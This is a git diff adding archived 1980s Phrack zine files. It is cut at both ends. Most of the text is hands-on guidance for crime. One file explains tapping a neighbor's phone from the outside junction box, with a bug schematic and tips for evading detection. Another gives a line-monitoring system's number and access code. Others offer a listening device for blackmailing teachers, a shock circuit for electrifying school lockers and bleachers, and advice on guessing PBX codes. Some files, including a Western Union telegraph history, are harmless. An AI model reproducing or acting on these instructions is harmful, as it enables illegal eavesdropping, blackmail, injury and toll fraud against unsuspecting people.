+1700 + 900 = Delay operator, also, in TSPS,STP (a "Zero Plus" call from a coin
+             phone)
+1700 + 1100= KP1 (Start recognition of special tones)
+1300 + 1700= KP2 (End recognition of special tones)
+
+12-85  Data Line. CIS 72767,3207: TWX 650-240-6356
+
+
+
diff --git a/phrack3/5.txt b/phrack3/5.txt
new file mode 100644
index 0000000..0ca022a
--- /dev/null
+++ b/phrack3/5.txt
@@ -0,0 +1,239 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 5 of 10
+
+
+                             * PRIVATE AUDIENCE *
+
+                  (A BASIC LESSON IN THE ART OF LISTENING IN)
+
+                               BROUGHT TO YOU BY
+
+                              -[ THE OVERLORD ]-
+
+-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
+
+
+                                PART I: THE LAW
+
+
+Federal law:
+  Section 605 of title 47 of the U.S code, forbids interception of
+communication, or divulagance of intercepted communication except by persons
+outlined in section 119 of title 18 (a portion of the Omnibus crime control and
+safe streets act of 1968). This act states that "It shall not be unlawful under
+this act for an operator of a switchboard, or an officer, employee, or agent of
+any communication common carrier who's switching system is used in the
+transmission of a wire communication to intercept or disclose intercepted
+communication."
+
+What all this legal bullshit is saying is that if you don't work for a phone
+company then you can't go around tapping people's lines. If you decide to
+anyway, and get caught, it could cost you up to 5 years of your life and
+$10,000. This, you are all assuming, means that if you tap someone else's line,
+you will be punished....wrong! You can't tap your own line either. The
+punishment for this is probably no more than a slap on the hand, that is if
+they actually catch you, but it's a good thing to know..............now on to
+the fun.....
+
+                               PART II: TAPPING
+
+Everyone has at some time wanted to hear what a friend, the principal, the prom
+queen, or a neighbor has to say on the phone. There are several easy ways to
+tap into a phone line. None of the methods that I present will involve actually
+entering the house. You can do everything from the backyard. I will discuss
+four methods of tapping a line. They go in order of increasing difficulty.
+
+1. The "beige box": a beige box (or bud box) is actually better known as a
+"lineman" phone. They are terribly simple to construct, and are basically the
+easiest method to use. They consist of nothing more than a phone with the
+modular plug that goes into the wall cut off, and two alligator clips attached
+to the red and green wires. The way to use this box, is to venture into the
+yard of the person you want to tap, and put it onto his line. This is best done
+at the bell phone box that is usually next to the gas meter. It should only
+have one screw holding it shut, and is very easily opened. Once you are in, you
+should see 4 screws with wires attached to them. If the house has one line,
+then clip the red lead to the first screw, and the green to the second. You are
+then on the "tappee's" phone. You will hear any conversation going on. I
+strongly recommend that you remove the speaker from the phone that you're using
+so the "tappee" can't hear every sound you make. If the house has two lines,
+then the second line is on screws three and four. If you connect everything
+right, but you don't get on the line, then you probably have the wires
+backward. Switch the red to the second screw and the green to the first. If no
+conversation is going on, you may realize that you can't tap the phone very
+well because you don't want to sit there all night, and if you are on the
+phone, then the poor tappee can't dial out, and that could be bad...so.......
+method two.
+
+2. The recorder: This method is probably the most widespread, and you still
+don't have to be a genius to do it. There are LOTS of ways to tape
+conversations. The two easiest are either to put a "telephone induction pickup"
+(Radio Shack $1.99) on the beige box you were using, then plugging it into the
+microphone jack of a small tape recorder, and leaving it on record. Or plugging
+the recorder right into the line. This can be done by taking a walkman plug,
+and cutting off the earphones, then pick one of the two earphone wires, and
+strip it. There should be another wire inside the one you just stripped. Strip
+that one too, and attach alligators to them. Then follow the beige box
+instructions to tape the conversation. In order to save tape, you may want to
+use a voice activated recorder (Radio Shack $59), or if your recorder has a
+"remote" jack, you can get a "telephone recorder control" at Radio shack shack
+for $19 that turns the recorder on when the phone is on, and off when the phone
+is off. This little box plugs right into the wall (modularly of course), so it
+is best NOT to remove the modular plug for it. Work around it if you can. If
+not, then just do you best to get a good connection. When recording, it is good
+to keep your recorder hidden from sight (in the Bell box if possible), but in a
+place easy enough to change tapes from.
+
+3. The wireless microphone: this is the BUG. It transmits a signal from the
+phone to the radio (FM band). You may remember Mr. Microphone (from Kaytel
+fame); these wireless microphones are available from Radio Shack for $19. They
+are easy to build and easy to hook up. There are so many different models, that
+is is almost impossible to tell you exactly what to do. The most common thing
+to do is to cut off the microphone element, and attach these two wires to
+screws one and two. The line MIGHT, depending on the brand, be "permanently off
+hook". This is bad, but by phucking around with it for a while, you should get
+it working. There are two drawbacks to using this method. One, is that the poor
+asshole who is getting his phone tapped might hear himself on "FM 88, the
+principal connection". The second problem is the range. The store bought
+transmitters have a VERY short range. I suggest that you build the customized
+version I will present in part four (it's cheaper too). Now on to the best of
+all the methods....
+
+4. The "easy-talks": This method combines all the best aspects of all the the
+other methods. It only has one drawback... You need a set of "Easy-talk" walkie
+talkies. They are voice activated, and cost about $59. You can find 'em at toy
+stores, and "hi-tech" catalogs. I think that any voice activated walkie talkies
+will work, but I have only tried the easy-talks. First, you have to decide on
+one for the "transmitter" and one for the "receiver". It is best to use the one
+with the strongest transmission to transmit, even though it may receive better
+also. De-solder the speaker of the "transmitter", and the microphone of the
+"receiver". Now, go to the box. put the walkie talkie on "VOX" and hook the
+microphone leads (as in method three) to the first and second screws in the
+box. Now go home, and listen on your walkie talkie. If nothing happens, then
+the phone signal wasn't strong enough to "activate" the transmission. If this
+happens, there are two things you can do. One, add some ground lines to the
+microphone plugs. This is the most inconspicuous, but if it doesn't work then
+you need an amplifier, like a walkman with two earphone plugs. Put the first
+plug on the line, and then into one of the jacks. Then turn the volume all the
+way up (w/out pressing play). Next connect the second earphone plug to the mice
+wires, and into the second earphone outlet on the walkman. Now put the whole
+mess in the box, and lock it up. This should do the trick. It gives you a
+private radio station to listen to them on: you can turn it off when something
+boring comes on, and you can tape off the walkie talkie speaker that you have!
+
+                      PART IV: WIRELESS TRANSMITTER PLANZ
+
+This is a tiny transmitter that consists on a one colpitts oscillator that
+derives it's power from the phone line. Since the resistance it puts on the
+line is less than 100 ohms, it has no effect on the telephone performance, and
+can not be detected by the phone company, or the tappee. Since it is a
+low-powered device using no antenna for radiation, it is legal to the FCC.
+(That is it complies with part 15 of the FCC rules and regulations). It,
+however is still illegal to do, it's just that what you're using to do it is
+legal. This is explained later in part 15... "no person shall use such a device
+for eavesdropping unless authorized by all parties of the conversation" (then
+it's not eavesdropping is it?). What this thing does, is use four diodes to
+form a "bridge rectifier". It produces a varying dc voltage varying with the
+auto-signals on the line. That voltage is used to supply the the voltage for
+the oscillator transistor. Which is connected to a radio circuit. From there,
+you can tune it to any channel you want. The rest will all be explained in a
+minute....
+
+
+
+
+
+PARTS LIST
+item                |              description
+-----------------------------------------------------------------
+C1                  | 47-Pf ceramic disk capacitor
+C2,C3               | 27-Pf mica capacitor
+CR1,CR2,CR3,CR4     | germanium diode 1n90 or equivalent
+R1                  | 100 ohm, 1/4 watt 10% composition resistor
+R2                  | 10k, 1/4 watt 10% composition resistor
+R3                  | .7k, 1/4 watt 10% composition resistor
+L1                  | 2 uH radio frequency choke (see text)
+L2                  | 5 turns No.20 wire (see text)
+Q1                  | Npn rf transistor 2N5179 or equivalent
+-----------------------------------------------------------------
+
+L1 may be constructed by winding approximately 40 turns of No. 36
+enamel wire on a mega-ohm, 1/2 watt resistor. The value of L1 is
+not critical. L2 can be made by wrapping 5 turns of No. 20 wire
+around a 1/4 inch form. After the wire is wrapped, the form can
+be removed. Just solder it into place on the circuit board. It
+should hold quite nicely. Also be sure to position Q1 so that the
+emitter, base, and collector are in the proper holes. The
+schematic should be pretty easy to follow. Although it has an
+unusual number of grounds, it still works.
+
+
+
+
+                  |------------------L1----------------|
+                 --                                    |
+            CR1 /  \ CR2              |----------------|
+A--------------/    \ --|         ----|          |     |
+       |       \    /   |         |   |          C2    L2
+       |    CR3 \  /CR4 |         C1  R2    |----|     |
+      R1         --     |         |   |    gnd   C3    |
+       |         |      |         ----|          |-----|
+       |        gnd     |             |                |
+       |                |             |-----|----Base  collector
+       |                |                   R3     \   /
+B-----------------------|                   |       \/\ <- Q1
+                                           gnd       \/
+                                                     |
+                                                     |
+                                                    emitter(gnd)
+
+
+
+The odd thing about this bug that we haven't encountered yet, is that it is put
+on only one wire (either red or green) so go to the box, remove the red wire
+that was ALREADY on screw
+1 and attach it to wire 'A' of the bug. Then attach
+wire 'B' to the screw itself. You can adjust the frequency which it comes out
+on the FM channel by either smooshing, or widening the coils of L2. It takes a
+few minutes to get to work right, but it is also very versatile. You can change
+the frequency at will, and you can easily record off your radio.
+
+                           PART FIVE: HELPFUL HINTS
+
+
+First of all, With method one, the beige box, you may notice that you can also
+dial out on the phone you use. I don't recommend that you do this. If you
+decide to anyway, and do something conspicuous like set up a 30 person
+conference for three hours, then I suggest that you make sure the people are
+either out of town or dead. In general, when you tap a line, you must be
+careful. I test everything I make on my line first, then install it late at
+night. I would not recommend that you leave a recorder on all day. Put it on
+when you want it going, and take it off when you're done. As far as recording
+goes, I think that if there is a recorder on the line it sends a sporadic beep
+back to the phone co. I know that if you don't record directly off the line
+(i.e off your radio) then even the most sophisticated equipment can't tell that
+you're recording. Also, make sure that when you install something, the people
+are NOT on the line. Installation tends to make lots of scratchy sounds, clicks
+and static. It is generally a good thing to avoid. It doesn't take too much
+intelligence to just make a call to the house before you go to install the
+thing. If it's busy then wait a while. (This of course does not apply if you
+are making a "midnight run").
+
+All in all, if you use common sense, and are *VERY* careful, chances are you
+won't get caught. Never think that you're unstoppable, and don't broadcast what
+you're doing. Keep it to yourself, and you can have a great time.
+
+                       -[ OVERLORD ]-
+
+THANKS TO:
+
+The CircleLord
+TARAN KING
+Knight Lightning
+The Forest Ranger
+P-80 systems
+
+Watch for more advanced tapping, how they catch you, and verification in the
+near future.
+
+
+
diff --git a/phrack3/6.txt b/phrack3/6.txt
new file mode 100644
index 0000000..5f7fb6d
--- /dev/null
+++ b/phrack3/6.txt
@@ -0,0 +1,100 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 6 of 10
+
+                                Fortell Systems
+                          Written by Phantom Phreaker
+
+                       Call The Alliance at 618-667-3825
+
+Fortell systems seem to be a system to monitor lines. They can only be used to
+monitor lines within their own NPA.
+ A Fortell system is at 716-955-7750. Whene you call, you will hear:
+
+'Hello. This is the Taradyne Fortell system. Please enter ID code'
+
+The ID for this system is 722877*. After you type that in (DTMF) it will ask
+'please enter line number' where you then type the PRE+SUFF of the number you
+wish to check within the NPA of the Fortell.
+  After you enter a number, it will repeat the number you entered. Now it will
+ask you to 'please enter mode'.
+
+The modes are:
+
+1-Calling on other line
+2-Calling on test line
+3-Line test results
+
+If you enter mode 1, you will have these commands available:
+
+1-Fault location
+2-Other testing
+7-Test ok, Monitor
+8-Hang up
+9-Enter next line number
+
+ If you enter 7 here, it will repeat what you selected, and ask for an ID code
+which can be any 6 digit number followed by a *.
+
+ Now it will dial and tell you:
+ 'Subscriber busy-busy-monitor test in progress conversation on line-short on
+line'
+
+2-Monitor test
+3-Overide and test
+4-Wait for idle
+
+ If you enter 2, (Monitor Test) it will tell you the busy status again.
+
+ If you enter 3, it will override, or tell you 'Not available in this CO'.
+
+ If you enter 4, (Wait for idle) it will wait until the line is idle.
+
+
+If you enter 1 (Fault Location) at the main list you will get these options:
+
+1-Open location
+3-Short location
+4-Cross location
+5-Ground location
+8-Hang up
+
+If you enter 2 (Other testing) here, you will have these commands:
+
+2-Loop Ground OHMS
+3-Dial tone test
+5-Pair ID
+8-Hang up
+
+If you enter Mode 2, you will have these options:(Other testing)
+
+2-Other testing
+7-Test ok, Monitor
+8-Hang up
+9-Enter next line number
+
+  It will repeat what you selected. If you select 2 here, you will now have
+these commands:
+
+2-Loop Ground Omhs
+8-Hang up
+
+ If you select 7 at the main list after mode 2, it will ask for an ID which is
+any 6 digit number followed by a *. Now it will dial and check the number. If
+the number is busy, it will say 'Subcriber busy-monitor-test in progress-
+conversation on line-short on line-please hang up-waiting for idle' Now you can
+just type * to go back to the main list of commands.
+
+      If you enter MODE 3, if you have done a test before, it will give you the
+results of the test. If you haven't done a test, it will tell you so with 'No
+test results available'
+
+ You can abort back to the main commands list by typing a *.
+
+ By typing a 9 at several places you will be taken back to the beginning where
+it asks you to 'enter line number'
+
+
+PP-01/06/86
+
+
+
diff --git a/phrack3/7.txt b/phrack3/7.txt
new file mode 100644
index 0000000..e713b04
--- /dev/null
+++ b/phrack3/7.txt
@@ -0,0 +1,79 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 7 of 10
+
+        ***************************************************************
+        *                                                             *
+        *               Electronic Eavesdropper                       *
+        *                                                             *
+        *               by                                            *
+        *                                                             *
+        *               Circle Lord                                   *
+        *                                                             *
+        ***************************************************************
+
+
+     Have you ever considered buying one of those hi powered microphones often
+seen in eletronics magazines, but thought it was to much to buy and to small to
+card?   The circuit shown in this file will provide you with the information to
+build one for a lot less money.
+     These audio eavesdropping devices are probably one of the hottest items in
+the underground due to their ability to pick up voices through thick walls.
+You can also attach the speaker wires to a tape recorder and save all the
+conversation.   As one can see these are great for blackmailing a teacher,
+classmate, principal, neighbor, or whoever you seek services from...
+
+
+
+Parts list:
+
+-=EM--------------------------
+M1    Amplifier Module. (Lafayette 99C9037 or equiv.)
+M2    9-VDC battery.
+M3    Microphone
+R1    20K poteniometer with spst switch.
+S1    Spst switch on R1
+SP1   8-ohm speaker
+T1    Audio transformer (Radio Crap part  273-1380)
+
+
+
+                        Schematics
+                        +------+--------M1
+                        1      1        1
+                        1      1red     1blu
+                        1      1        1
+                        1      transformer
+                        1      1        1
+                        1      1yel     1grn
+                        +------+        1
+                               1  +-----+      +-----+
+                               1  1            1     1
+                              b1 b1 r+M2+b o+S1+o    1
+                              l1 l1 e1  1l r1  1r    1
+                              k1 u1 d1  1k g1  1g    1
+                            **********************   1
+                           *                yel>*-+  ++
+                           *                    * R   1
+                           *         M1         * 1-+ 1
+                           *                red>*-+ 1 1
+                           *                    *   1<<
+                           **********************   1
+                             b1   1g    y1          1
+                             l1   1r    e1          1
+                             k1   1y    l1          1
+                              1   1      +----------+
+                              +SP1+
+
+
+S1 here is on the potentiometer
+M3 can be an earphone earpiece
+
+
+
+
+                               ----          /
+                              /             /
+                             /             /
+                            /    ircle    /    ord
+                            ----          ----
+
diff --git a/phrack3/8.txt b/phrack3/8.txt
new file mode 100644
index 0000000..b13c27d
--- /dev/null
+++ b/phrack3/8.txt
@@ -0,0 +1,69 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 8 of 10
+
+        ***************************************************************
+        *                                                             *
+        *                      Making a Shock Rod                     *
+        *                                                             *
+        *                             By                              *
+        *                                                             *
+        *                        Circle Lord                          *
+        *                                                             *
+        ***************************************************************
+
+
+This handy little circuit is the key to generating THOUSANDS of volts of
+electricity for warding off attackers (notice the plural).   It generates it
+all from a hefty 6-volt source and is easily fit into a tubular casing.
+Originally used as a fence charger, this circuit can be put to other uses such
+as: charging a whole row of lockers at school, a row of theater seats, or a
+metal bleacher set in the gym. More on this later.
+
+To build this, all you need is a GE-3 transistor, a 6.3-volt transformer, and a
+handful of spare parts from old radios.   The ammount of shock you wish to
+generate is determined by the setting of potentiometer R1, a 15,000 ohm
+variable resistor.   Hint: for maximum shock, set R1 at maximum!
+
+
+***************************************************************
+Item    *  Description
+***************************************************************
+ C1      * 500uF, 10-WVDC electrolytic capacitor
+ C2      * 2000uF, 15-WVDC electrolytic capacitor
+ M1      * 6-VDC battery
+ M2,M3   * Leads
+ Q1      * GE-3 transistor (2n555 will also do)
+ R1      * 15K potentiometer
+ R2      * 160-ohm resistor
+ S1      * Spst switch
+ T1      * 6.3-VAC filament transformer (Triad F-14x or equiv.)
+ X1      * 1N540 diode
+
+***************************************************************
+
+
+                        Schematics:
+
+                            +---C1--------------+
+                            1                   1   HOT
+                            1     +-----+       1  LEAD
+                            +---1<Q1    1        )(-->
+                          R1*     +     1   +--->)(
+                        +-->*     1     1   1    )(
+                        1   *  +--+     1   1    )(-->
+                        1   1  1  1     1   1    1 TO
+                        1   1  1  1     1   1    1 GND
+                        1   *  C2 1     +---1----+
+                        1  R2  1  1         1    1
+                        1   *  1  1         1 X1 1
+                        +---+--+--1---------1-->-+
+                                  1 +/-     1    1
+                                  +*M1*-*S1*+   GND    -
+
+
+         ----         /
+        /            /
+       /            /
+      /    ircle   /    ord
+      ----         ----
+
diff --git a/phrack3/9.txt b/phrack3/9.txt
new file mode 100644
index 0000000..bdf130e
--- /dev/null
+++ b/phrack3/9.txt
@@ -0,0 +1,118 @@
+                                ==Phrack Inc.==
+                    Volume One, Issue Three, Phile 9 of 10
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+@                                  _  _        _______                        @
+@                                 | \/ |      / _____/                        @
+@                                 |_||_|etal / /hop                           @
+@                                 __________/ /                               @
+@                                /___________/                                @
+@                                   PRIVATE                                   @
+@                                                                             @
+@                                 Presents...                                 @
+@                                                                             @
+@                    \\\\\=-{ Knight Lightning's }-=/////                     @
+@                                                                             @
+@                           "Introduction to PBXs"                            @
+@                                                                             @
+@                                                                             @
+@                         Written on January 3, 1986                          @
+@                                                                             @
+@                                                                             @
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+This file is a personal continuation of the PBX entry in the MCI
+Telecommunications Glossary.
+_______________________________________________________________________________
+
+A telephone exchange serving an individual organization and having connections
+to a public telephone exchange is called a Private Branch Exchange (PBX).  The
+PBX performs a switching function by connecting any extension in the private
+organization to an outside line.  A PBX is actually a private switch that
+connects a group of telephones within an individual organization.  Calls placed
+outside this individual group are connected to a telephone company's central
+office switch through trunks.  A PBX may be operated by an attendant from the
+private organization or the switching system may be done automatically.  Other
+terms that are commonly used interchangeably with PBX are: Private Automatic
+Branch Exchange (PABX), Private Automatic Exchange (PAX), and Computerized
+Branch Exchange (CBX).  Although these terms were originally used to identify
+specific switch structures, today they are often used as synonyms.
+
+PBXs can use any of three basic switching methods: step-by-step (SxS),
+Cross-bar (X-bar), and computer controlled, to perform the basic function of
+switching.  However, in addition to detecting calls and establishing a
+transmission link between two telephones, PBXs can do much more.
+
+The common control, often called a central processing unit (CPU), controls the
+switching matrix that connects the stations and trunks.  The switching matrix
+of a PBX performs the same job as does an operator at a manual switchboard or a
+common control central office switch.  The CPU, however, gets its instructions
+from the "stored program", which contains directions for activities, such as
+detecting calls, sending them over the best available route, and recording
+billing information.  These computerized electronic switches are used to
+perform routine, as well as unique, functions that simply weren't practical or
+even possible with electromechanical switches.
+
+Just as in the public switched network, PBX switches make connection between
+instruments, or "key telephone sets".  We're all familiar with key telephone
+sets, whether we know them by name or not.  They're the business telephones
+that have six push-button keys lined up below the dial--a red button marked
+"hold" and five buttons or lines with flashing lights.
+
+Systems with PBXs and key sets have a great deal of flexability in planning for
+their needs because they can set up their codes to accomplish the functions
+needed in their particular situations.  In fact, the PBX can be programmed so
+that each individual extension within a system can take advantage of features
+applicable to its own business needs.
+
+Some of the features that are availiable with PBXs and key systems are: call
+transfer, which allows internal or external calls to be transferred from one
+telephone to any other phone in the system; automatic push-button signaling,
+which indicates the status of all phones in the system with display lights and
+buttons; one-way voice paging, which can be answered by dialing the operator
+from the nearest telephone in the system; camp-on, in which a call made to a
+busy phone automatically waits until the line is idle; and internal and
+external conference capabilities, which enables outside callers to conference
+with several inside users.
+
+Some features automatically handle incoming telephone calls.  Automatic call
+waiting not only holds calls made to a busy extension until the extension is
+free, but also signals the person being called that a call is waiting and
+informs the caller that he is on hold.  Automatic call forwarding will send
+calls to employees who are temporarily in locations other than their offices,
+provided they "inform" the PBX where they can be found.  Automatic call
+distribution automatically send an incoming call to the first extension that's
+not busy--a useful feature for situations in which any one of a group of
+persons in the organization can adequately respond to incoming calls.  Another
+example is automatic call back, which allows a caller who reaches a busy line
+to ask the PBX to return his or her call when the line is free.
+
+Still other features provide services such as night telelphone answering,
+telephone traffic monitoring, and network or hot-line connection.  These
+examples are but a sample from the features possible with computerized PBXs.
+
+===============================================================================
+This is a very brief description of how to use and what to expect on a PBX.
+-------------------------------------------------------------------------------
+Basically, you call the PBX and you will have to enter a code that can be
+anywhere from 4 to 6 digits (Note: some PBXs do not require codes).  Then you
+will hear a dial tone.  From here you would under normal circumstances dial:
+9 + 1 (or 0) + NPA-PRE-SUFF, for long distance dialing or dial 8 for local
+dialing.
+
+The most common use of the PBX is to call Alliance Teleconferencing,
+a teleconference service offered by AT&T.  To do this dial:
+0700-456-1000,1002,1003,2000,2001,2002.
+
+Note: PBX codes are usually very simple and usually 4 digits.
+EX: 0000, 1111, 1234, etc
+===============================================================================
+Look for a file on Alliance Teleconferencing coming soon...
+_______________________________________________________________________________
+
+This has been a Knight Lightning presentation...
+
+@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+
+
+
diff --git a/phrack30/1.txt b/phrack30/1.txt
new file mode 100644
index 0000000..540228c
--- /dev/null
+++ b/phrack30/1.txt
@@ -0,0 +1,52 @@
+                                ==Phrack Inc.==
+
+                     Volume Three, Issue 30, File #1 of 12
+
+                    Phrack Inc. Newsletter Issue XXX Index
+                    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+                               December 24, 1989
+
+     Welcome to Issue 30 of Phrack Inc.  We are releasing this just a few short
+days before the start of a new decade and proud to say that we will continue to
+bring you more information well into the 1990s.
+
+     SummerCon 1990!  That's right.  Preliminary plans are being made right
+now, so, starting with this issue, keep your eye on Phrack World News for
+details!  The dates have been decided so mark your calendars!
+
+     This issue of Phrack Inc. features a large article by Goe that contains
+some information about VM/CMS which can, if used properly, be of great use.
+Also in this issue, Jack T. Tab brings us a VAX/VMS version of the Fakemail
+program that was featured for Unix in Phrack Inc. Volume Three, Issue 27, File
+#8.  Also, Network Miscellany III, compiled by Taran King, contains a
+relatively large list of FTP sites that allow anonymous FTP for those of you
+who have been poking and stabbing around the Internet.  These along with all of
+the rest of the articles should prove to be interesting reading for you!
+
+     Do you have access to the Wide Area Networks?  Are you on Fidonet?  How
+about UUCP or CompuServe?  If so, you can drop a line to us through the
+networks at the addresses listed below.  We'd love to hear from you!
+
+                   Taran King       &       Knight Lightning
+
+                              phrack@netsys.COM
+                    ...!netsys!phrack  (phrack@netsys.UUCP)
+                     phrack%netsys.COM@LLL-WINKEN.LLNL.GOV
+                      phrack%netsys.COM@AMES.ARC.NASA.GOV
+                         phrack%netsys.COM@RUTGERS.EDU
+_______________________________________________________________________________
+
+Table of Contents:
+
+1.  Phrack Inc. XXX Index by Taran King and Knight Lightning
+2.  Network Miscellany III by Taran King
+3.  Hacking & Tymnet by Synthecide
+4.  Hacking VM/CMS by Goe
+5.  The DECWRL Mail Gateway by Dedicated Link
+6.  Decnet Hackola : Remote Turist TTY (RTT) by *Hobbit*
+7.  VAX/VMS Fake Mail by Jack T. Tab
+8.  Consensual Realities in Cyberspace by Paul Saffo
+9.  The Truth About Lie Detectors by Razor's Edge
+10.   Western Union Telex, TWX, and Time Service by Phone Phanatic
+11-12 Phrack World News XXX/Parts 1-2 by Knight Lightning
+_______________________________________________________________________________
diff --git a/phrack30/10.txt b/phrack30/10.txt
new file mode 100644
index 0000000..ee5196a
--- /dev/null
+++ b/phrack30/10.txt
@@ -0,0 +1,202 @@
+                                ==Phrack Inc==
+
+                    Volume Three, Issue 30, File #10 of 12
+
+                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+                   ===                                   ===
+                   ===           Western Union           ===
+                   ===   Telex, TWX, and Time Service    ===
+                   ===                                   ===
+                   ===         by Phone Phanatic         ===
+                   ===                                   ===
+                   ===        September 17, 1989         ===
+                   ===                                   ===
+                   =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+
+         "Until a few years ago -- maybe ten -- it was very common to
+          see TWX and Telex machines in almost every business place."
+
+There were only minor differences between Telex and TWX.  The biggest
+difference was that the former was always run by Western Union, while the
+latter was run by the Bell System for a number of years.  TWX literally meant
+"(T)ype(W)riter e(x)change," and it was Bell's answer to competition from
+Western Union.  There were "three row" and "four row" machines, meaning the
+number of keys on the keyboard and how they were laid out.  The "three row"
+machines were simply part of the regular phone network; that is, they could
+dial out and talk to another TWX also connected on regular phone lines.
+
+Eventually these were phased out in favor of "newer and more improved" machines
+with additional keys, as well as a paper tape reader attachment which allowed
+sending the same message repeatedly to many different machines.  These "four
+row" machines were not on the regular phone network, but were assigned their
+own area codes (410-510-610-710-810-910) where they still remain today.  The
+only way a four row machine could call a three row machine or vice-versa was
+through a gateway of sorts which translated some of the character set unique to
+each machine.
+
+Western Union's network was called Telex and in addition to being able to
+contact (by dial up) other similar machines, Telex could connect with TWX (and
+vice-versa) as well as all the Western Union public offices around the country.
+Until the late 1950's or early 1960's, every small town in America had a
+Western Union office.  Big cities like Chicago had perhaps a dozen of them, and
+they used messengers to hand deliver telegrams around town.  Telegrams could be
+placed in person at any public office, or could be called in to the nearest
+public office.
+
+By arrangement with most telcos, the Western Union office in town nearly always
+had the phone number 4321, later supplemented in automated exchanges with some
+prefix XXX-4321.  Telegrams could be charged to your home phone bill (this is
+still the case in some communities) and from a coin phone, one did not ask for
+4321, but rather, called the operator and asked for Western Union.  This was
+necessary since once the telegram had been given verbally to the wire clerk,
+s/he in turn had to flash the hook and get your operator back on the line to
+tell them "collect five dollars and twenty cents" or whatever the cost was.
+Telegrams, like phone calls, could be sent collect or billed third party.  If
+you had an account with Western Union, i.e. a Telex machine in your office, you
+could charge the calls there, but most likely you would simply send the
+telegram from there in the first place.
+
+Sometime in the early 1960's, Western Union filed suit against AT&T asking that
+they turn over their TWX business to them.  They cited an earlier court ruling,
+circa 1950's, which said AT&T was prohibited from acquiring any more telephone
+operating companies except under certain conditions.  The Supreme Court agreed
+with Western Union that "spoken messages" were the domain of Ma Bell, but
+"written messages" were the domain of Western Union.  So Bell was required to
+divest itself of the TWX network, and Western Union has operated it since,
+although a few years ago they began phasing out the phrase "TWX" in favor of
+"Telex II"; their original device being "Telex I" of course.  TWX still uses
+ten digit dialing with 610 (Canada) or 710/910 (USA) being the leading three
+digits.  Apparently 410-510 have been abandoned; or at least they are used very
+little, and Bellcore has assigned 510 to the San Francisco area starting in a
+year or so.  410 still has some funny things on it, like the Western Union
+"Infomaster," which is a computer that functions like a gateway between Telex,
+TWX, EasyLink and some other stuff.
+
+Today, the Western Union network is but a skeleton of its former self.  Now
+most of their messages are handled on dial up terminals connected to the public
+phone network.  It has been estimated the TWX/Telex business is about fifty
+percent of what it was a decade ago, if that much.
+
+Then there was the Time Service, a neat thing which Western Union offered for
+over seventy years, until it was discontinued in the middle 1960's.  The Time
+Service provided an important function in the days before alternating current
+was commonly available.  For example, Chicago didn't have AC electricity until
+about 1945.  Prior to that we used DC, or direct current.
+
+Well, to run an electric clock, you need 60 cycles AC current for obvious
+reasons, so prior to the conversion from DC power to AC power, electric wall
+clocks such as you see in every office were unheard of.  How were people to
+tell the time of day accurately?  Enter the Western Union clock.
+
+The Western Union, or "telegraph clock" was a spring driven wind up clock, but
+with a difference.  The clocks were "perpetually self-winding," manufactured by
+the Self-Winding Clock Company of New York City.  They had large batteries
+inside them, known as "telephone cells" which had a life of about ten years
+each.  A mechanical contrivance in the clock would rotate as the clock spring
+unwound, and once each hour would cause two metal clips to contact for about
+ten seconds, which would pass juice to the little motor in the clock which in
+turn re-wound the main spring.  The principle was the same as the battery
+operated clocks we see today.  The battery does not actually run the clock --
+direct current can't do that -- but it does power the tiny motor which re-winds
+the spring which actually drives the clock.
+
+The Western Union clocks came in various sizes and shapes, ranging from the
+smallest dials which were nine inches in diameter to the largest which were
+about eighteen inches in diameter.  Some had sweep second hands; others did
+not.  Some had a little red light bulb on the front which would flash.  The
+typical model was about sixteen inches, and was found in offices, schools,
+transportation depots, radio station offices, and of course in the telegraph
+office itself.
+
+The one thing all the clocks had in common was their brown metal case and
+cream-colored face, with the insignia "Western Union" and their corporate logo
+in those days which was a bolt of electricity, sort of like a letter "Z" laying
+on its side.  And in somewhat smaller print below, the words "Naval Observatory
+Time."
+
+The local clocks in an office or school or wherever were calibrated by a
+"master clock" (actually a sub-master) on the premises.  Once an hour on the
+hour, the (sub) master clock would drop a metal contact for just a half second,
+and send about nine volts DC up the line to all the local clocks.  They in turn
+had a "tolerance" of about two minutes on both sides of the hour so that the
+current coming to them would yank the minute hand exactly upright onto the
+twelve from either direction if the clock was fast or slow.
+
+The sub-master clocks in each building were in turn serviced by the master
+clock in town; usually this was the one in the telegraph office.  Every hour on
+the half hour, the master clock in the telegraph office would throw current to
+the sub-masters, yanking them into synch as required.  And as for the telegraph
+offices themselves, they were serviced twice a day by -- you guessed it -- the
+Naval Observatory Master clock in Our Nation's Capitol, by the same routine.
+Someone there would press half a dozen buttons at the same time, using all
+available fingers; current would flow to every telegraph office and synch all
+the master clocks in every community.  Western Union charged fifty cents per
+month for the service, and tossed the clock in for free!  Oh yes, there was an
+installation charge of about two dollars when you first had service (i.e. a
+clock) installed.
+
+The clocks were installed and maintained by the "clockman," a technician from
+Western Union who spent his day going around hanging new clocks, taking them
+out of service, changing batteries every few years for each clock, etc.
+
+What a panic it was for them when "war time" (what we now call Daylight Savings
+Time) came around each year!  Wally, the guy who serviced all the clocks in
+downtown Chicago had to start on *Thursday* before the Sunday official
+changeover just to finish them all by *Tuesday* following.  He would literally
+rush in an office, use his screwdriver to open the case, twirl the hour hand
+around one hour forward in the spring, (or eleven hours *forward* in the fall
+since the hands could not be moved backward beyond the twelve going
+counterclockwise), slam the case back on, screw it in, and move down the hall
+to the next clock and repeat the process.  He could finish several dozen clocks
+per day, and usually the office assigned him a helper twice a year for these
+events.
+
+He said they never bothered to line the minute hand up just right, because it
